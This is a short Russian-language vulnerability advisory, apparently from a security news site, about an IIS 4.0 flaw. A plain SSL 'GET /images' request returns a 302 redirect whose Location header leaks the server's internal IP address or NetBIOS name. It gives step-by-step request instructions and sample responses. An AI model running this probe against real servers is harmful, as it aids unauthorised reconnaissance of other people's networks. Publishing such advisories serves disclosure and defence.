e-Synergies обнаружили и исследовали уязвимость в Internet Information Server. Успешная эксплуатация этой уязвимости может показать критическую внутреннюю информацию типа внутреннего IP адреса или внутреннего имени хоста.
Информацию можно получить, соединяясь вручную с TCP/443 портом (SSL) (например, используя Perl (SSLeay)).

Эксплоит: 

1-Просматриваем интернет сайт, используя SSL броузер и находим любой каталог.
К примеру: https://www.target.com/images/icon.gif 

2-Используем совместимый SSL Perl сценарий, выполните следующую команду:  

GET /images HTTP/1.0 (если не получится попробуйте HTTP/1.1)

3- Результат должен выглядеть следующим образом: 

HTTP/1.1 302 Object Moved 
Location: https://192.168.1.10/images/ 
Server: Microsoft-IIS/4.0 
Content-Type: text/html 
Content-Length: xxx 

Или 

HTTP/1.1 302 Object Moved 
Location: https://netbiosname/images/ 
Server: Microsoft-IIS/4.0 
Content-Type: text/html 
Content-Length: xxx

Оставить мнение